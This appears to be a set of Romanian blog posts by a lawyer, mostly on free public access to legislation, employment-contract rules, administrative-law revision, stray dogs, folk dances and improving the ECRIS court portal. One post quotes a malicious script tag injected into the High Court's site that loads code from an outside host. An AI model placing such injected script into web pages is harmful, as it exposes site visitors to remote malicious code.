Am avut surpriza să găsesc respectiva colecție și pe un sait despre care rotld.ro spunea că numele de domeniu este înregistrat de domnul Andrei Săvescu (avocat, coordonator al juridice.ro): www.moficial.ro.
Colecția era publicată în cea mai brută formă posibilă, serverul generând o listă simplă a documentelor, grupate pe ani. Fără reclame, fără nume, fără stiluri, fără asocieri cu vreo persoană.
Am mai descoperit apoi că aceeași rețetă era folosită și de saitul www.kurtyan.org, cu diferența că acesta cuprinde toate părțile publicației oficiale a statului (I-VII):

• I – acte ale parlamentului, ale guvernului, ale miniștrilor, ale unor instanțe și autorități centrale etc.;
• II – acte privind activitatea parlamentară;
• III – diverse acte juridice, înscrisuri, comunicări etc.;
• IV – acte juridice referitoare la operatori economici sau alte persoane juridice;
• V – contracte colective de muncă, convenții și recomandări ale Organizației Internaționale a Muncii;
• VI – anunțuri privind achizițiile publice;
• VII – publicații ale societăților cooperative.

Am aflat apoi și de conflictul dintre Regia Autonomă Monitorul Oficial (RAMO) și domnii Andrei Săvescu și Alberto Kurtyan. Pe scurt, RAMO a sesizat organele de urmărire penală cu privire la încălcarea unor drepturi de proprietate intelectuală pe care regia le-ar avea asupra Monitorului Oficial; detalii aici:

• Monitorul Oficial on-line gratuit. UPDATE: aspecte penale
• Alberto Kurtyan sanctionat pentru publicarea legilor Romaniei
• Monitorul Oficial s-a pus stapan pe legislatia Romaniei (…)

Cumva pentru a evita eventuale pretenții ale RAMO referitoare la formatul „protejat” al Monitorului Oficial, alți prieteni au inițiat pe cheltuiala și munca lor un alt sait – civvic.ro – care are un scop pe cât de generos, pe atât de greu de atins: publicarea în mod gratuit a conținutului Monitorului Oficial într-un format text, ușor de prelucrat prin mijloace electronice (spre deosebire de formatul PDF oferit de RAMO). Nu e prima lor „abatere”. Dacă utilizați dexonline.ro, ați făcut deja cunoștință cu munca lor.

E de prisos să reiau o întreagă justificare a legitimității publicării în mod gratuit a Monitorului Oficial. Au făcut-o alții mai pricepuți înainte.
E clar ca lumina zilei că legea este o informație de interes public, care trebuie să fie accesibilă oricui și că e datoria statului să depună toate eforturile necesare pentru cunoașterea ei. Felul în care stau lucrurile acum nu poate continua prea mult. Nu trebuie ratat prilejul real de dezbatere oferit de conflictele cu RAMO ale celor doi juriști. Poate că prin emisiunile de pălăvrăgeală continuă de la TV se va găsi și niște loc pentru discutarea unei probleme care, indirect sau direct, îi afectează pe toți cei care trăiesc în această țară.

Poate așa află și concetățenii noștri că, potrivit autorităților statului, legislația trebuie să fie o afacere și nu un bun comun, dar, în același timp, nimeni nu poate invoca în fața vreunei autorități că nu a cunoscut legea (cine nu cunoaște celebra zicere nemo censetur ignorare legem?).
Legislația, în viziunea reprezentanților statului, trebuie să fie o colecție de PDF-uri sau de coli de proastă calitate, trântite aproape zilnic, cuprinzând o mulțime de modificări ale modificărilor, pentru care cetățenii trebuie să aibă respect și să plătească abonamente piperate la tiparnița de legi.

O regulă banală a dreptului românesc este aceea că se aplică legea în vigoare la momentul realizării unui act sau fapt juridic. Dacă, de pildă, pentru fapte petrecute în 2006, am nevoie de textul în vigoare la acea dată al vreunei monstruozități normative (ex. Legea 247/2005, Legea 571/2003, Legea 161/2003 etc. etc., ca să nu mai vorbim despre aberantele norme metodologice – v. cele ale Codului fiscal pentru o idee de legislație secundară a la România…), am ghinion. Trebuie să răscolesc colecția de hârtii sau PDF-uri cu Monitorul Oficial și să pun cap la cap forma de atunci a legii care m-ar interesa. Și cum la noi modificările nu numai că sunt prea frecvente, dar sunt și haotice, e greu să îți dai seama dacă la o anume dată nu exista cumva vreo ordonanță de urgență a cărei lege de aprobare o modifica (lege la rândul ei modificată de o altă ordonanță…). De un real ajutor în asemenea încercări ar fi Baza de date legislativă oferită gratuit de Camera Deputaților. Acolo îți poți face o idee despre actele care au modificat o lege. Defectul ei: nu e întotdeauna completă și actualizată. Chiar și așa, este enorm timpul pierdut pentru compilarea unui text normativ, în scopul de a afla forma aplicabilă la o anume dată.
Avem calculatoare, Internet, tehnologii care ușurează viața etc., dar statul nostru continuă să prefere și să impună formele secolului trecut (v. dependența de hârtie, taxele pentru orice, timbrele fiscale și judiciare, ștampilele, dischetele, ghișeul cu ușiță de geam…).

„De ce nu cumperi un produs informatic cu legislația României?” De ce ar trebui? Legislația e obligatorie; ar trebui ca și un abonament la un produs software (oficial sau neoficial) să fie obligatoriu? Plătim deja impozite suficient de mari încât RAMO să aibă resurse pentru a face un sait în care să afișeze, fără restricții, abonamente, taxe sau tarife, tot ceea ce este public și obligatoriu pentru noi. Nu e însă de ajuns. Ceea ce ne oferă trebuie să beneficieze de toată încrederea că reprezintă un act oficial. Mai mult, orice modificare a unui act normativ trebuie să fie urmată imediat și automat de o consolidare a acestuia, astfel încât, pentru orice dată în care acest act este în vigoare, oricine să poată consulta forma integrală a actului, în multiple formate (ex. HTML, PDF). Aș avea de adăugat și o propunere de versionare a actelor normative, inspirată din sisteme de „revision control” – de discutat cu altă ocazie.
Repet exemplul pe care îl menționez adesea: Legifrance – serviciul public francez de difuzare a dreptului prin Internet.

Așa ceva a fost deja cerut și de inițiatorii unui proiect legislativ respins în ambele camere ale parlamentului. Acea inițiativă poate fi îmbunătățită, evitând criticile formale ale guvernului și realizând un obiectiv de interes pentru toți cetățenii. Un astfel de obiectiv îl are și apelul public făcut de juridice.ro: Legislatia Romaniei: Gratuit si Integral. Printre semnatari se află, probabil în majoritate, juriști (avocați, consilieri juridici, judecători etc.) care au avut suficiente ocazii să constate că e nevoie de o schimbare esențială a felului în care statul român comunică legislația.

Cei doi domni menționați mai sus au făcut un serviciu publicului. Și-au asumat riscul de a publica gratuit ceea ce statul ar fi trebuit să publice gratuit și riscul de a fi hărțuiți prin procese de RAMO. Pentru acest curaj și pentru beneficiile pe care le au vizitatorii saiturilor lor merită recunoștința și susținerea noastră, nicidecum amenzi sau condamnări penale.

Citește și:
Inflația legislativă în România
Goliat

Ideea că modelul este obligatoriu a fost cumva întreținută și de practica ITM în perioada în care exista obligația angajatorilor de a depune și înregistra contractele de muncă sau actele adiționale la acestea (v. Legea 130/1999 privind unele măsuri de protecție a persoanelor încadrate în muncă, în prezent abrogată). Atunci, un simplu contract redactat diferit de model era capabil să „blocheze sistemul” vreunui funcționar, care era în stare să refuze înregistrarea contractului până când acesta nu era „remediat”.

Scurt istoric

În 2003 a fost adoptat actualul cod al muncii, modernizând la acel moment legislația de bază în domeniul raporturilor de muncă (codul în vigoare până atunci a fost Legea 10/1972 – textele acesteia referitoare la orânduirea socialistă au rezistat aproape 13 ani după Revoluție).
Tot în 2003, ministrul muncii, promotor al Legii 53/2003, a emis Ordinul 64/2003 pentru aprobarea modelului-cadru al contractului individual de muncă. Ultima modificare a acestui ordin de ministru a fost făcută prin Ordinul 1.616/2011, după schimbările efectuate asupra Codului muncii (v. forma republicată).

În paralel cu modelul prevăzut în ordinul de ministru, contractul colectiv de muncă unic la nivel național (atât cel pentru anii 2005-2006, cât și cel pentru anii 2007-2010), cuprindea la articolul 71:3 următoarea prevedere: CIM va cuprinde cel puțin clauzele prevăzute în anexa nr. 3. Modelul din această anexă avea diferențe minore față de cel din ordinul de ministru. În prezent, contractul colectiv de muncă la nivel național nu mai are acoperire în lege (v. articolul 128:1 din Legea 62/2011 a dialogului social).

Obligativitatea modelului din ordinul de ministru

Separarea puterilor în stat presupune delimitarea atribuțiilor acestora. În principiu, potrivit Constituției, parlamentul („unica autoritate legiuitoare a țării”) emite legi, guvernul „potrivit programului său de guvernare acceptat de Parlament, asigură realizarea politicii interne și externe a țării și exercită conducerea generală a administrației publice”, iar prin hotărâri „organizează executarea legilor”, instanțele judecătorești realizează justiția. În dreptul românesc, cel puțin teoretic, există o ierarhie a normelor juridice – acele reguli de conduită obligatorii, care pot fi puse în aplicare inclusiv cu ajutorul constrângerii exercitate de stat. În această ierarhie, normele Constituției și cele ale tratatelor internaționale privind drepturile omului, respectiv ale dreptului comunitar, prevalează asupra normelor incluse în acte cu forță de lege (legi, ordonanțe ale guvernului); acestea din urmă prevalează asupra normelor incluse în hotărâri de guvern, ordine de ministru etc.
Așa se face că, pentru a fi legal, orice act al guvernului sau al unui membru al guvernului trebuie să fie întemeiat pe un act cu forță juridică superioară. Altfel, guvernul sau membrii săi ar avea putere de a emite norme generale și obligatorii, în aceleași condiții ca și parlamentul – ceea ce echivalează cu o nesocotire a separării puterilor în stat.

Aceste idei sunt conținute și în Legea 24/2000 privind normele de tehnică legislativă pentru elaborarea actelor normative:

Articolul 4
Ierarhia actelor normative
(1) Actele normative se elaborează în funcție de ierarhia lor, de categoria acestora și de autoritatea publică competentă să le adopte.
(2) Categoriile de acte normative și normele de competență privind adoptarea acestora sunt stabilite prin Constituția României, republicată, și prin celelalte legi.
(3) Actele normative date în executarea legilor, ordonanțelor sau a hotărârilor Guvernului se emit în limitele și potrivit normelor care le ordonă.

Articolul 42
Formula introductivă
(4) La celelalte categorii de acte normative formula introductivă cuprinde autoritatea emitentă, denumirea generică a actului, în funcție de natura sa juridică, precum și temeiurile juridice pe baza și în executarea cărora actul a fost emis.

Articolul 77
Actele date în executarea unui act normativ
Ordinele cu caracter normativ, instrucțiunile și alte asemenea acte ale conducătorilor ministerelor și ai celorlalte organe ale administrației publice centrale de specialitate sau ale autorităților administrative autonome se emit numai pe baza și în executarea legilor, a hotărârilor și a ordonanțelor Guvernului. În formula introductivă a acestor acte normative vor fi cuprinse toate temeiurile juridice prevăzute la art. 42 alin. (4).

Articolul 78
Sfera reglementării
Ordinele, instrucțiunile și alte asemenea acte trebuie să se limiteze strict la cadrul stabilit de actele pe baza și în executarea cărora au fost emise și nu pot conține soluții care să contravină prevederilor acestora.

În cazul ordinului de ministru prin care era aprobat modelul-cadru al contractului individual de muncă, formula introductivă, exprimând temeiul juridic al actului, arată astfel:

Având în vedere prevederile art. 17 alin. (3) din Legea nr. 53/2003 – Codul muncii,
în baza art. 7 din Hotărârea Guvernului nr. 4/2001 privind organizarea și funcționarea Ministerului Muncii și Solidarității Sociale, cu modificările și completările ulterioare,
ministrul muncii și solidarității sociale emite următorul ordin:

Ordinul 1.616/2010 schimbă numai referința către hotărârea de guvern privind organizarea ministerului muncii (HG 11/2009).

Să verificăm cele două referințe normative menționate în formula introductivă:

Codul muncii
Articolul 17
(3) Persoana selectată în vederea angajării ori salariatul, după caz, va fi informată cu privire la cel puțin următoarele elemente: (…)

HG 11/2009 privind organizarea și funcționarea Ministerului Muncii, Familiei și Protecției Sociale
Articolul 12
În exercitarea atribuțiilor sale, ministrul muncii, familiei și protecției sociale emite ordine, norme și instrucțiuni.

Singurele temeiuri care stau la baza ordinului privind modelul de contract sunt (1) un text legal referitor la obligația de informare pe care o are angajatorul și (2) un text dintr-o hotărâre de guvern care arată că ministrul muncii poate emite ordine. În lipsa unei abilitări explicite, prevăzute de un act cu forță superioară ordinului, în concret, cele două temeiuri invocate apar ca simple referințe formale, insuficiente pentru a susține ordinul de ministru.

Potrivit articolului 17:4 din Codul muncii, „Elementele din informarea prevăzută la alin. (3) trebuie să se regăsească și în conținutul contractului individual de muncă”. Este clar că existența acestor elemente este obligatorie în contract. Nu contează ordinea, modul de structurare, numerotarea articolelor, formatul etc. cât timp, în fond, fiecare dintre cele 14 elemente de conținut are o exprimare clară în cuprinsul contractului. Nu contează forma prevăzută de ordinul de ministru, cât timp fondul prevăzut de lege este respectat.

În plus, presupunând că modelul din ordinul de ministru ar fi obligatoriu, care ar putea fi sancțiunea pentru un angajator care urmează cu strictețe conținutul cerut de lege, dar nu și forma prevăzută din ordinul de ministru? O asemenea sancțiune nu este prevăzută nicăieri – nici în Codul muncii, nici în ordin. Presupunând că ITM ar sancționa cu amendă contravențională neutilizarea modelului de contract, o astfel de sancțiune ar fi aplicată în mod nelegal, întrucât în cazul contravențiilor (și al infracțiunilor, de altfel) funcționează principiul legalității sancțiunii – cf. articolul 3:1 din OG 2/2001 privind regimul juridic al contravențiilor: „Actele normative prin care se stabilesc contravenții vor cuprinde descrierea faptelor ce constituie contravenții și sancțiunea ce urmează să se aplice pentru fiecare dintre acestea”.

Modelul-cadru de contract nu este conceput pentru a acoperi toate situațiile în care se încheie un contract individual de muncă. De pildă, modelul nu are în vedere ipoteza unor contracte speciale – v. contractul privind desfășurarea activității în străinătate (articolul 18), contractul de muncă temporară (articolul 94), contractul individual de muncă la domiciliu (articolul 109). Nici referirea de la articolul G:1 la Legea 31/1991 privind stabilirea duratei timpului de muncă sub 8 ore pe zi pentru salariații care lucrează în condiții deosebite – vătămătoare, grele sau periculoase nu este aplicabilă chiar tuturor cazurilor concrete în care se încheie contractul. De altfel, deși unele texte din model figurează ca alineate numerotate, ele se exclud reciproc (ex. durata muncii este fie normală – H:1 -, fie parțială – H:2; ambele opțiuni incluse în același contract nu au sens, fiind necesară marcarea uneia dintre ele ca fiind aplicabilă).

Concluzionând, modelul-cadru de contract individual de muncă nu este un formular tipizat, obligatoriu și de neschimbat, ci un simplu model de care angajatorii pot ține cont. În cazul în care aleg să utilizeze un model propriu de contract, trebuie să respecte cu strictețe cerințele de conținut prevăzute în lege, inclusiv pentru forma specifică a raportului de muncă ales (ex. muncă temporară, la domiciliu, în străinătate etc.).

Lista de ședințe nu funcționează. Văzând ceea ce era afișat, bănuiam că vreun dorel nu a închis cum trebuie niște ghilimele prin sursă. Încerc să aflu despre ce e vorba și văd ceva și mai drăgălaș: <script src=”http://lilupophilupop.com/sl.php”></script>. O căutare pe Google lămurește problema – injecție SQL. ECRIS (versiunea anacronică, din 2005, pentru Î.C.C.J.) se pare că e vulnerabil. Cam cât de romantic ar fi ca și ECRIS IV, folosit de restul instanțelor din țară, să aibă astfel de vulnerabilități?…

Curtea de Apel București se fălește deja cu un nou sait (se putea mai bine… părerea mea), pe când unul nou, funcțional și util și la Î.C.C.J.?

La mulți ani!

Completare (4 ianuarie 2012): S-a reparat.

Citește și:
ECRIS – este bun, dar poate fi și mai bun

După ce România a devenit stat membru al Uniunii Europene (1 ianuarie 2007) Legea 554/2004 a contenciosului administrativ a fost modificată, printre altele fiind adăugat un caz special de revizuire (v. articolul 21:2), pe lângă cele din dreptul comun (v. articolul 322 din Codul de procedură civilă):

(2) Constituie motiv de revizuire, care se adaugă la cele prevăzute de Codul de procedură civilă, pronunțarea hotărârilor rămase definitive și irevocabile prin încălcarea principiului priorității dreptului comunitar, reglementat de art. 148 alin. (2), coroborat cu art. 20 alin. (2) din Constituția României, republicată. Cererea de revizuire se introduce în termen de 15 zile de la comunicare, care se face, prin derogare de la regula consacrată de art. 17 alin. (3), la cererea temeinic motivată a părții interesate, în termen de 15 zile de la pronunțare. Cererea de revizuire se soluționează de urgență și cu precădere, într-un termen maxim de 60 de zile de la înregistrare.

Scopul evident al acestei noi prevederi era acela de a oferi un remediu pentru cazurile în care instanțele naționale au pronunțat hotărâri irevocabile care încalcă principiul priorității dreptului comunitar (dreptul Uniunii Europene). Criticabil ar fi faptul că acest remediu este prevăzut numai în contextul contenciosului administrativ. Or, dreptul comunitar poate fi încălcat și în alte ramuri de drept, acolo neputându-se folosi cazul special de revizuire prevăzut de Legea 554/2004.
Nu cunosc rata de succes a revizuirilor bazate pe acest caz special. Pot bănui că majoritatea lor au fost respinse (ex. hotărârile atacate „nu evocau fondul”, instanțele nu au constatat o încălcare a dreptului comunitar etc.). Totuși, fie și teoretic și iluzoriu, era un mijloc pus la dispoziția justițiabililor.

Prin Decizia 1.609/2010 a Curții Constituționale a fost admisă excepția de neconstituționalitate privind teza a doua a alineatului citat mai sus – fraza referitoare la termenul de introducere a cererii de revizuire. În această situație a devenit aplicabil textul articolului 33 din Legea 47/1992 (suspendarea efectelor juridice ale normei neconstituționale pentru 45 de zile, urmată de încetarea efectelor după expirarea acestui termen).

Proiectul de modificare a Legii 554/2004 a ajuns în dezbatere parlamentară mai întâi în Camera Deputaților. Forma inițiatorului, adoptată tacit de Cameră (în aprilie 2011), clarifica textul criticat de Curtea Constituțională: „(…) Hotărârea se comunică părții interesate în termen de 30 de zile de la pronunțare. Cererea de revizuire se introduce în termen de 15 zile de la comunicare (…)”.
Apoi a venit rândul Senatului (aveți răbdare cu pagina web…). Comisia juridică din Senat a hotărât, pe baza unei motivări criticabile, cu referiri mai ales la noul Cod de procedură civilă (Legea 134/2010 – adoptată, dar a cărei intrare în vigoare e lăsată în incertitudine), că întregul alineat (2) trebuie abrogat.
Senatul a adoptat proiectul și astfel, prin Legea 299/2011, alineatul (2) al articolului 21 din Legea 554/2004 a fost abrogat.

P.S. În actuala așezare, camera decizională poate modifica total și esențial un proiect primit de la prima cameră sesizată, această modificare devenind lege, indiferent de dezbaterile, propunerile, timpul pierdut etc. din prima cameră.

Aventura nu s-a lăsat prea mult așteptată. M-au întâmpinat doi câini cărora le călcasem teritoriul. Unul dintre ei a reușit să mă „composteze” tocmai când credeam că scăpasem din zona fierbinte. Am simțit mușcătura de deasupra gleznei, dar nu i-am dat prea multă importanță. După ce am mai mers câteva zeci de metri zona mușcată a început să doară. Abia atunci am observat că aveam pantalonul rupt destul de serios și că rana sângera încet.

Mi-am rezolvat treburile la barou, iar apoi am revenit acasă. Mi-am curățat și pansat rana.
Abia pe seară, la insistența Cristianei și după ce apucasem să citesc pe net despre rabie, am mers la spital pentru un vaccin.

La registratura urgenței chiar înainte să apuc să întreb ce-i de făcut, mi-a luat-o înainte o domnișoară care spunea că ea a fost prima. Am lăsat-o să întrebe. Așa am aflat că și ea fusese mușcată de un câine vagabond.
După ce am dat informațiile cerute de asistentă am așteptat să îmi vină rândul la vaccin. Nu era vorba de unul antirabic, ci de unul antitetanos.

Am așteptat vreo oră și jumătate până să fiu strigat – cazuri cu prioritate, urgențe etc. Am fost vaccinat și am primit o rețetă și o trimitere pentru un consult privind oportunitatea unui vaccin antirabic.

De Sf. Nicolae, după rezolvarea cazului de la judecătorie, am mers la spital. Doctorul de la boli infecțioase a apreciat că nu e cazul pentru un vaccin antirabic, riscul de infectare fiind minim (nu sunt un fan al înțepăturilor, așa că nu am așteptat să se răzgândească). Am cumpărat apoi și pastilele (Oxacilină).

Frumos dar…

Nu am vreo fobie față de câini. Am crescut la țară, unde bunicii mei aveau vreo 14 câini, de la pitici (denumiți copoi în acea regiune) la câini mari, ciobănești. Când aveam 5 ani am fost mușcat chiar de față de unul dintre câinii mari din curte. Nu m-a afectat prea mult asta – am doar o cicatrice destul de mică pe obraz. Am continuat să fiu prieten cu câinii. Ori de câte ori mai ajung pe la țară îmi place să mă joc cu ei. Nici față de câinii de pe stradă nu am vreo teamă, chiar dacă am fost alergat de turme de câini când eram cu bicicleta.

Cu toate astea, deja nu mai pot asculta fără reacție „dezbaterea” despre câinii fără stăpân, eutanasie etc. Sunt sătul să aud că victimele sunt, până la urmă, vinovate pentru că au fost mușcate (am auzit și inepții precum: câinii sunt niște „biete suflete”, care mușcă numai oamenii răi; numai câinii care au mușcat pe cineva ar trebui eutanasiați etc.). Sunt sătul și să văd marii apărători ai „drepturilor” animalelor (ex. avocata P. Iacob, ex-senatorul M. Marinescu) intervenind la TV de fiecare dată când se discută despre eutanasierea câinilor fără stăpân. De fiecare dată sunt uimit de apărarea înverșunată pe care o fac animalelor, uitând că victimele lor sunt oameni. Pentru unii pare chiar scuzabilă suferința pricinuită unui om. Cei care mor (exemplu, alt exemplu) sau care rămân mutilați sunt vinovații. Lor le este mereu imputabilă fie neatenția, fie prostia, fie răutatea. Câinii sunt doar biete victime ale victimelor lor…

Prevenirea înmulțirii câinilor vagabonzi este una, iar prevenirea riscului de a fi mușcat este alta. Nu există nicio garanție că un câine care a fost sterilizat (dacă a fost…), marcat cu un plastic pe ureche și apoi lăsat pe stradă, nu mai poate mușca.

E paradoxal că este considerată contravenție „lăsarea în libertate ori fără supraveghere a animalelor care pot prezenta pericol pentru persoane sau bunuri” (Legea 61/1991, articolul 3:17; v. și feluritele acte ale administrației publice locale), dar față de animalele fără stăpân care sălășluiesc în oraș și care pot prezenta pericol pentru persoane autoritățile nu au nicio responsabilitate. Chiar și C.E.D.O. a condamnat recent statul român într-o speță care a pornit de la un incident cu câini vagabonzi.

E paradoxal și că, în vreme ce alte animale (ex. miei, porci, găini) sunt ucise pentru hrană (de multe ori, după ce au fost crescute în ferme în condiții revoltătoare), fără campanii de protest, în cazul uciderii câinilor fără stăpân există o opoziție însuflețită de atât „umanism”.

Nu-mi fac iluzii că legea votată recent, care a provocat atâtea istericale pe holurile parlamentului și pe la posturile TV, va schimba ceva. Consiliile locale vor dovedi umanism electoral, „cetățenii” se vor milostivi de bietele necuvântătoare, victimele vor continua să fie vinovate, iar cei care susțin eutanasia vor fi în continuare „criminali”, comparabili cu naziștii. S-a întâmplat vreodată ca literele unui text de lege să schimbe ceva în această țară?

@trolling off

1. Jocul cu bâtă
2. Brâul
3. Pe loc
4. Buciumeana
5. Poarga românească
6. Mărunțel

Am ales câteva interpretări care merită ascultate (poarga și mărunțelul sunt excelente!):

1. Varianta cântată strict după partitură de o orchestră kurdă:
Béla Bartók – Dansuri populare românești (The Kurdish String Orchestra)

2. Varianta cântată de o orchestră maghiară, cu câteva intervenții surprinzătoare ale grupului Muzsikás. Merită fiecare secundă:
Béla Bartók – Dansuri populare românești (The Danubia Orchestra & Muzsikás)

3. Varianta cântată de o orchestră țigănească, fără partituri, în sinagoga din Budapesta (muzică inspirată din folclorul românesc, compusă de un maghiar, cântată de țigani într-un lăcaș de cult evreiesc!)
Béla Bartók – Dansuri populare românești (The Rajko Orchestra)

II. Să trecem un pic și la dans. M-a impresionat o formație din Republica Moldova: Ansamblul JOC. Dansează excelent călușul oltenesc:

Dansul călușarilor (Ansamblul JOC)

Și pentru că v-am reamintit melodia, iat-o interpretată de o trupă de klezmer din Canada:

Călușarii – Beyond the Pale

Apropo de dansuri românești, am fost surprins să aflu că sunt o mulțime de clipuri cu străini (i.e. americani, japonezi, chinezi, danezi…) învâțând dansuri cu nume precum:

Floricica oltenească

Galaonul de la Bârca (chinezi în costume populare românești!…)

Alunelul bătut

Rustemul

Arcanul bătrânesc

Vulpiuța

Pe loc (iarăși Muzsikás și doi dansatori; v. și tema din dansurile lui Bartók)

La mulți ani!

Citește și:
Ce sărbătorim noi azi?
1 Decembrie

1. Feedback

Criticile, observațiile, sugestiile ar fi mai eficiente dacă ar și ajunge la persoanele/instituțiile potrivite (v. Ministerul Justiției și producătorul aplicației). Vechea cutie pentru sugestii și reclamații are un corespondent electronic ușor de pus în operă – v. issue tracking system – care ar face inutilă discutarea acestor subiecte pe bloguri sau forumuri. Bugtrackerele folosite în procesele de asigurare a calității în programare (v. unul în acțiune), pot fi deschise și utilizatorilor de aplicații puse la dispoziție de instituții publice (v. ECRIS, Revisal etc.); de altfel, bugtrackerele pot fi extinse și asupra altor procese, nu neapărat legate de o aplicație software – ex. relațiile instituțiilor publice cu cetățenii, consultarea publică privind legiferarea.

ECRIS poate fi îmbunătățit pe baza feedbackului primit de la utilizatori – indiciu: issue tracker.

2. Mai multe informații

Informațiile care se găsesc pe portal sunt mult mai sărace decât cele afișate la infochioșcuri. De pildă, la infochioșcuri este afișată lista cu denumirile înscrisurilor existente la dosar (e adevărat, adesea incompletă) și termenele la care acestea au fost depuse, componența completului de judecată, numărul soluției pronunțate de instanță etc. Asemenea informații nu apar, însă, și pe portal. În ambele locuri nu ar strica și o ordonare cronologică (descrescătoare) a termenelor.
Din moment ce pe listele de ședință sunt afișate numele judecătorilor și ale grefierilor de ședință, de ce asemenea informații nu ar putea fi afișate și pe Internet? Bineînțeles, atât pe lista de ședințe, cât și pe fișa fiecărei cauze, pentru fiecare termen. Aceste informații pot fi elegant completate cu numele procurorilor de ședință (acolo unde e cazul) și ale reprezentanților părților (avocați, consilieri juridici, simpli mandatari). Ar prinde bine și o coerență în privința redactării numelor (dacă judecătorul este menționat ca Ionel POPESCU, de ce inculpatul sau vreo altă parte ar apărea ca IONESCU Gigi?! scrierea cu majuscule a numelui de familie ar aduce claritate pentru nume precum Viorel Ion).

Un alt detaliu care ar putea reduce numărul de requesturi HTTP pe sait ar fi afișarea cât mai detaliată și ergonomică a informațiilor. De exemplu, scenariul tipic de utilizare (cel puțin pentru mine) e următorul:

1. accesez adresa http://noulportal.just.ro/;
2. selectez județul, apoi instanța, apoi dau click pe linkul „Dosare” din lateral;
3. caut fie numărul de dosar, fie un nume al unei părți;
4. dau click pe rezultatul dorit din listă.

În fișa dosarului astfel obținută nu este indicat completul, ca să nu mai vorbesc despre ora de începere a ședinței sau despre sala de judecată. Pentru a afla, totuși, completul, accesez lista de ședințe pentru data dorită, verific lista fiecărui complet cu specializarea căutată (și sunt, de regulă, mai multe complete de penal sau de civil; trebuie văzută lista fiecăruia pentru a ajunge la cauza căutată) și dau click pe numărul de dosar. Abia așa aflu informații despre complet și ora de început a ședinței.
În ceea ce privește indicarea sălii de judecată, o soluție simplă ar fi conceperea unei scheme unice la nivel național (ex. Sala 1, nu Camera xyz) și a unor panouri de orientare, astfel încât orice persoană citată să știe cu siguranță încotro să meargă, fără a mai fi nevoie de indicații primite de la personalul instanței și fără a trebui să se familiarizeze cu obiceiurile administrative de acolo.

Navigarea pe portal în prezent e destul de unidirecțională și liniară. Un sistem simplu de breadcrumbs ar putea ajuta la orientare și la acces mai rapid la informații. De asemenea, starea curentă a cauzelor trebuie descrisă mai bine. De pildă, fișa unei cauze de la instanța de fond poate conține un link către fișa de la instanța din calea de atac (apel, recurs…), eventual cu menționarea părții care exercită calea de atac și a datei.

ECRIS ar putea afișa mai multe informații (indicativul completului de judecată, numele tuturor participanților în proces, sala de ședință, ora, calea de atac exercitată), într-un mod mai ergonomic.

3. Publicarea tuturor hotărârilor

Printre lamentările obișnuite în legătură cu justiția românească se află și cea privind practica neunitară – posibilitatea (adesea concretizată) ca două instanțe diferite (uneori, chiar două complete diferite ale aceleiași instanțe) să pronunțe soluții diferite asupra unor probleme similare. Primul pas spre un remediu ar fi să se cunoască practica (toată practica și numai practica…). Hotărârile sunt redactate folosind calculatoare. În paralel cu forma lor imprimată pe hârtie, pe portal ar putea fi foarte bine afișate cu link de download, în dreptul fiecărui termen de judecată.
Mă refer aici la toate hotărârile, indiferent de denumirea lor (încheieri, sentințe, decizii – v. articolul 255 din Codul de procedură civilă și articolul 311 din Codul de procedură penală).

Dispozitivul fiecărei hotărâri ar putea fi afișat în continuare pentru fiecare termen. E esențial ca acest dispozitiv să fie identic cu cel din documentul oferit spre descărcare. O rezolvare simplă ar fi: cu ajutorul interfeței grafice a ECRIS hotărârea este redactată pe părți (i.e. partea introductivă, considerentele, dispozitivul; numele și celelalte date fiind preluate automat din înregistrarea dosarului), iar datele sunt asamblate în funcție de cerințe (ex. toate părțile sunt exportate ca document; numai dispozitivul este afișat ca HTML).

Ar fi de preferat ca hotărârile să aibă un șablon unic (eventual, cu elemente grafice mai elaborate), să fie salvate într-un format precum PDF (mai dificil de editat) și să poarte semnătura electronică a membrilor completului de judecată (știu, asta sună deja a Star Trek…).

În acest fel nu numai că justiția ar deveni ceva mai transparentă și ușor de urmărit, dar s-ar atinge și obiectivul proiectului Jurindex (Toate hotărârile judecătorești pe Internet); v. și modelul francez. Simpla publicare a unor PDF-uri nu ar fi suficientă. Ar mai trebui ca sistemul să includă și un solid motor de căutare în baza de date și, eventual, o sortare inteligentă pe materii, faze procesuale etc.

ECRIS ar putea afișa toate hotărârile judecătorești (că doar toate poartă mențiunea că au fost pronunțate în ședință publică…) și semnate electronic, și indexate pentru a ușura documentarea juridică.

4. URL-uri simple, intuitive pentru dosare și pentru hotărâri

Un URL tipic folosit de portal arată cam așa: http://noulportal.just.ro/InstantaDosar.aspx?idInstitutie=54&d=MzA0MDAwMDAwMDAwMTExNTY*. Bun, putem identifica un query string cu un câmp idInstitutie care corespunde numărului de identificare al instanței stabilit prin regulamentul de ordine interioară al instanțelor, dar cel de-al doilea câmp (un număr codat în base64) este complet împotriva ideii de ergonomie și simplitate. Resursa respectivă poate fi accesată folosind un URL mai prietenos cu memoria și cu intuiția umană. Bunăoară, dacă numărul de dosar este 123456/12/2011, ce ar împiedica folosirea lui direct în URL (unul rescris mai simplu): http://portal.just.ro/d/123456/12/2011? (aici, d vine de la dosarul)

Dacă ar deveni vreodată posibilă accesarea hotărârilor pe Internet (v. punctul anterior), și URL-ul acestora ar trebui să fie simplu și intuitiv. O idee ar fi folosirea unei referințe relative la numărul de dosar, nu la numărul de ordine al hotărârilor instanței – ex. http://portal.just.ro/c/123456/12/2011/2 pentru a doua hotărâre din dosar. URL-urile mai scurte și mai intuitive ar fi utile și în cazul citării hotărârilor într-o lucrare scrisă. Comparați URL-ul folosit ca exemplu cu unul recomandat de C.E.D.O.:

http://cmiskp.echr.coe.int/tkp197/view.asp?action=html&documentId=824161&portal=hbkm&source=externalbydocnumber&table=F69A27FD8FB86142BF01C1166DEA398649

sau cu unul folosit de C.J.U.E.:

http://eur-lex.europa.eu/LexUriServ/LexUriServ.do?uri=CELEX:62009CJ0402:RO:HTML

Mai departe, cum ar fi dacă am putea fi ținuți la curent cu starea unui dosar prin RSS sau un serviciu web?

ECRIS ar putea folosi URL-uri simplificate, făcute intuitive și ușor de citat. ECRIS ar putea oferi informații în formate ușor de procesat prin mijloace electronice.

5. Fără numere de dosar atipice

Schema de numerotare a dosarelor este la prima vedere simplă: [număr curent]/[număr de identificare al instanței]/[an] (ex. 1234/56/2012). Cel puțin așa prevede articolul 99² din regulamentul de ordine interioară al instanțelor judecătorești.
Totuși, destul de frecvent pot fi întâlnite numere de dosar atipice, ornamentate cu alte componente – ex. dosarul 27259/215/2010*/a5 sau 16041..01/3/2008.

Dacă tot există un sistem clar de numerotare, care e justificarea pentru adaosurile atipice de asteriscuri, litere, cifre, după al treilea element al numărului de dosar?

